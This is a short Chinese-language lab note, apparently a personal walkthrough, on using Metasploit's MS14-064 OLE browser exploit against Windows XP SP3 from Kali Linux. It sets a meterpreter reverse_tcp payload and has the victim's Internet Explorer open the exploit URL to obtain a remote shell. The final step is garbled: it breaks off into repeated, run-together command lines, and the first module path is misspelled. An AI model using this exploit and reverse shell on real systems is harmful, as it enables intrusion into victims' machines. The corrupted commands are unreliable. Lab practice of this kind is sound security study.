实验环境:kali linux、windows XP Professional SP3.
实验工具:metasploit framework
功能实现模块:use exploit/windows/brower/ms14_064_ole_code_execution
实验过程:
1.执行模块,查看参数配置,并且设置payload(set payload windows/meterpreter/reverse_tcp):
2.其他参数无需再配置,直接run就行。(如果端口LPORT被占用了,可以用set重新设置)
3.运行结果返回了一个url地址:http://192.168.1.24:8080/.在XP ie浏览器中执行该url地址:
成功获取shell
4.利用shell:
uuse exploit/windows/browser/ms14_064_ole_code_execution
use exploit/windows/browser/ms14_064_ole_code_executionse exploit/windows/browser/ms14_064_ole_code_execution